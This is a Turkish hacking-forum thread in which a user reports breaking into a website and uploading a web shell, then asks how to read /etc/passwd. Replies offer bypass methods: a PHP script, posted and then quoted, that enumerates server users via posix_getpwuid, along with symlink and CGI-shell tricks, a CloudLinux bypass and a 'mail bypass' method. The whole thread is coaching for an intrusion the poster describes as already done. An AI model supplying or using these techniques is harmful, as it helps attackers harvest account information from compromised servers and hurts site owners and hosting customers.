⌘K
Duyuru
Duyurular

/etc/passwd okuyamıyorum (1 Viewer)

WorthLess

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
C1 cekmeyi dene olmaz ise cloudlinux bypassla readme yap etc/paswd okunur büyük ihtimalle.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP: 
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
genel olarak bi çok script cat komutuyla geçer ve çoğu firma optimize yaparken bu komutları engeller sw geçme işi düşünme işidir sadece çekebilceğiniz 5-6 komut mevcut cgi shell açılıyorsa more less vs teker teker dene olmazsa bu sener yine cgi shellden more /etc/passwd > pw.txt olarak ln -s /etc/passwd > pw.txt olarak sürekli dene illaki gelir eğer gene olmadıysa shell üzerinden dizine gir litespeed yoksa girer yani direk shell den /etc gir passwd bulup edit bas gene okunur eğer cloud linux değilse.

eğer sunucu cloud linux ise mail bypass method ile çekebilirsin bunuda videolu eğitim seti olarak öncesinde forumda paylaşmıştım.
http://spyhackerz.com/forum/threads/orta-halli-videolu-eğitim-seti-1.3735/
bir sürü yolu var illaki çekersin çünkü her userin passwd dosyasında yetkisi ve hakkı vardır o passwd ya seve seve ya s*ke s*ke gelecek :D zamanında optimizasyon yaptıgımda baya uğraşıyordum engellemek için :)
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Mectruy' Alıntı:
Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP: 
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
Genişletmek için tıklayın ...
o_O
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Yanıt için giriş yapmanız veya üye olmanız gerekir.

Users who are viewing this thread

Toplam: 2 (Kullanıcı: 0, Ziyaretçi: 2)
133,313Konular
3,282,694Mesajlar
319,293Kullanıcılar
ahoomee22Son Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt